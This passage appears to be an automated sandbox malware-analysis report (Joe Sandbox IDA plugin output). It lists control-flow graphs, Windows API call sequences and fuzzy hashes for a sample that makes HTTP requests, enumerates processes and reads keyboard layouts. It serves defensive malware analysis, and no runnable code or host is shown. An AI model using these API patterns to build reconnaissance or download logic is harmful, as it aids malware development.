                                                                                                                                                                                                                                                    control_flow_graph 2124 9c472-9c498 2125 9c49a-9c49f 2124->2125 2126 9c4a4-9c4a8 2124->2126 2127 9ca9e-9caac call 9d016 2125->2127 2128 9c4aa-9c4af 2126->2128 2129 9c4b4-9c4bc 2126->2129 2128->2127 2131 9c4ce-9c4e5 lstrcpyA 2129->2131 2132 9c4be-9c4c2 2129->2132 2135 9ca99 2131->2135 2136 9c4eb 2131->2136 2132->2131 2134 9c4c4 2132->2134 2134->2131 2135->2127 2137 9c4f1-9c4f4 2136->2137 2138 9c4f9-9c4fd 2137->2138 2139 9c4f6 2137->2139 2138->2137 2140 9c4ff-9c511 2138->2140 2139->2138 2141 9c513-9c519 2140->2141 2142 9c536 2140->2142 2143 9c51c-9c521 2141->2143 2144 9c53d-9c54e 2142->2144 2143->2143 2145 9c523-9c534 2143->2145 2146 9c55f 2144->2146 2147 9c550-9c55d call 9b870 2144->2147 2145->2142 2145->2144 2149 9c565-9c56b 2146->2149 2147->2146 2147->2149 2151 9c56d-9c57a call 9bf47 2149->2151 2152 9c57c-9c57f 2149->2152 2163 9c5b4-9c5b8 2151->2163 2154 9c591-9c594 2152->2154 2155 9c581-9c58f call 9bfc6 2152->2155 2157 9c5a6-9c5a9 2154->2157 2158 9c596-9c5a4 call 9c0e9 2154->2158 2155->2163 2157->2135 2162 9c5af call 9c1ac 2157->2162 2158->2163 2162->2163 2163->2127 2166 9c5be-9c5fc lstrcpyA * 2 lstrlenA 2163->2166 2167 9c5fe-9c610 lstrcatA 2166->2167 2168 9c616-9c67d lstrcpyA 2166->2168 2167->2168 2169 9c67f-9c686 2168->2169 2170 9c691-9c6ae 2168->2170 2169->2170 2173 9c688-9c68a 2169->2173 2171 9c6b0-9c6b5 2170->2171 2172 9c6c5 2170->2172 2171->2172 2174 9c6b7-9c6c3 2171->2174 2175 9c6cb-9c7d7 call 9ae53 2172->2175 2173->2170 2174->2175 2178 9c7d9-9c7db call 9c2ec 2175->2178 2179 9c7ea-9c802 2175->2179 2183 9c7e0-9c7e5 2178->2183 2181 9c813-9c82e 2179->2181 2182 9c804-9c80e call 9c2ec 2179->2182 2185 9c83e-9c845 2181->2185 2186 9c830-9c834 2181->2186 2182->2127 2183->2127 2187 9c85f 2185->2187 2188 9c847-9c85e GetDesktopWindow GetTickCount srand 2185->2188 2186->2185 2190 9c836-9c83c call 9b7ef 2186->2190 2192 9c861-9c872 rand 2187->2192 2188->2187 2190->2185 2190->2186 2192->2192 2194 9c874-9c87d 2192->2194 2195 9c880-9c899 call 9b84d 2194->2195 2198 9c89b-9c89f 2195->2198 2199 9c8bb-9c8c3 2198->2199 2200 9c8a1-9c8a8 2198->2200 2201 9c8d3 2199->2201 2202 9c8c5-9c8cc 2199->2202 2200->2199 2203 9c8aa-9c8b7 call 9bd80 2200->2203 2205 9c8d5-9c8e5 2201->2205 2202->2201 2204 9c8ce-9c8d1 2202->2204 2203->2199 2204->2205 2207 9c90f 2205->2207 2208 9c8e7-9c8ea 2205->2208 2212 9c915-9c92e call 9c2ec 2207->2212 2210 9c8fc-9c8fe 2208->2210 2211 9c8ec-9c8f5 call 9c32d 2208->2211 2210->2212 2214 9c900-9c902 call 9c41a 2210->2214 2216 9c8fa 2211->2216 2212->2127 2219 9c934-9c93a 2212->2219 2220 9c907-9c90d 2214->2220 2216->2220 2219->2183 2221 9c940-9c96d 2219->2221 2220->2212 2222 9c9ea-9c9f1 2221->2222 2223 9c96f-9c972 2221->2223 2224 9c9fd-9c9ff 2222->2224 2225 9c9f3-9c9f8 2222->2225 2226 9c97d-9c98b 2223->2226 2227 9c974-9c97b 2223->2227 2228 9ca01-9ca03 2224->2228 2229 9ca05-9ca14 call 9b0b5 2224->2229 2225->2127 2230 9c999-9c9b9 call 9be60 2226->2230 2231 9c98d-9c992 2226->2231 2227->2222 2227->2226 2228->2225 2228->2229 2229->2183 2236 9ca1a-9ca25 2229->2236 2237 9c9bb-9c9c0 2230->2237 2238 9c9c5-9c9d4 call 9ae53 2230->2238 2231->2230 2239 9ca2c-9ca31 2236->2239 2237->2127 2238->2183 2244 9c9da-9c9e6 call 9be60 2238->2244 2239->2127 2241 9ca33-9ca7b malloc call a7050 malloc 2239->2241 2247 9ca7d-9ca80 2241->2247 2248 9ca84-9ca8d 2241->2248 2244->2239 2252 9c9e8 2244->2252 2253 9ca95-9ca97 2247->2253 2250 9ca8f 2248->2250 2251 9ca82 2248->2251 2250->2253 2251->2248 2252->2237 2253->2127
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: /$UT
                                                                                                                                                                                                                                                    • API String ID: 0-1626504983
                                                                                                                                                                                                                                                    • Opcode ID: 9e6827123cf2188a5408b35bfa2c12cac5eb3b88dd5c09e9b0779c5f85c328ea
                                                                                                                                                                                                                                                    • Instruction ID: 4f0cbb0387fee8ea1e84b71add22296a6f0568e473626f7747e8b6b2ddad6ab1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e6827123cf2188a5408b35bfa2c12cac5eb3b88dd5c09e9b0779c5f85c328ea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 390281B1D042688FEF61CF64C880BEEBBB5AF45304F1444E9D949AB242D7349E84DF95

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 2286 86963-869e7 call 90519 call 84ab6 call 904e7 InternetOpenA StrCmpCA 2293 869e9 2286->2293 2294 869ea-869f0 2286->2294 2293->2294 2295 86b6e-86b7a call 90519 2294->2295 2296 869f6-86a1c InternetConnectA 2294->2296 2300 86b7f-86baa call 82920 * 3 call 9d016 2295->2300 2298 86b62-86b68 InternetCloseHandle 2296->2298 2299 86a22-86a5d HttpOpenRequestA 2296->2299 2298->2295 2301 86a63-86a65 2299->2301 2302 86b56-86b5c InternetCloseHandle 2299->2302 2304 86a83-86ab4 HttpSendRequestA HttpQueryInfoA 2301->2304 2305 86a67-86a7d InternetSetOptionA 2301->2305 2302->2298 2307 86acb-86adb call 91afd 2304->2307 2308 86ab6 2304->2308 2305->2304 2316 86bab-86bb0 2307->2316 2317 86ae1-86ae3 2307->2317 2311 86abb-86ac6 call 904e7 2308->2311 2311->2300 2316->2311 2319 86b4a-86b50 InternetCloseHandle 2317->2319 2320 86ae5-86aea 2317->2320 2319->2302 2322 86b2b-86b48 InternetReadFile 2320->2322 2322->2319 2325 86aec-86af4 2322->2325 2325->2319 2326 86af6-86b26 call 90609 call 9058d call 82920 2325->2326 2326->2322
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
                                                                                                                                                                                                                                                      • Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000869C5
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 000869DF
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086A0E
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00086A4D
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00086A7D
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00086A88
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00086AAC
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 00086B40
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00086B50
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00086B5C
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00086B68
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                                                    • API String ID: 3863758870-2509457195
                                                                                                                                                                                                                                                    • Opcode ID: d99cee89bdbbd3916466174a522e6b101801ceeaad78763a37e78f25b2aa7ac1
                                                                                                                                                                                                                                                    • Instruction ID: 9da8bd3faff0bc8f3e75d8bb8860fdef2063c6f83bad84a6b0d5a270739fb48f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d99cee89bdbbd3916466174a522e6b101801ceeaad78763a37e78f25b2aa7ac1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6517C71900169AFDF60AB60EC85BEEB7F8FB04344F0181E2F588AA051DF315E859F90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,000B670D,?,?), ref: 00090E0C
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00090E1A
                                                                                                                                                                                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00090E28
                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00090E57
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00090EFF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                    • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                    • Opcode ID: 1590ab77ae9149f1e5dd9ee26612938ed27ce78ad043baa10c4f118894cb9d0b
                                                                                                                                                                                                                                                    • Instruction ID: 0b4fdea50364aaa3ca0ef055f64604c6684afb54e10b891c42b883b9f4beecf8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1590ab77ae9149f1e5dd9ee26612938ed27ce78ad043baa10c4f118894cb9d0b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36312AB1900228AFDF60AF64EC8DBDEB3B8BB04300F5145E5F519A7112DB746E859F60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 00092589
                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00097E31,.exe,000B6CCC,000B6CC8,000B6CC4,000B6CC0,000B6CBC,000B6CB8,000B6CB4,000B6CB0,000B6CAC,000B6CA8,000B6CA4), ref: 000925A8
                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 000925B8
                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000925CA
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 000925DC
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 000925F0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1799959500-0
                                                                                                                                                                                                                                                    • Opcode ID: f137533b1481651b34e2b82b1f21e3654c2c1180eae2e4cc031dcd3b2bf6e2fd
                                                                                                                                                                                                                                                    • Instruction ID: 572734618c5a63cf7976960ab432d9d7e3c0c790c8f53a5da9d8091eceb4c6f2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f137533b1481651b34e2b82b1f21e3654c2c1180eae2e4cc031dcd3b2bf6e2fd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36014471901515AFEF61ABA0EC08FEE77F89F15341F4500E6E449D6151EA348F80EB21
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000B6712,?,?), ref: 000914D4
                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 000914E4
                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00091542
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0009154D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
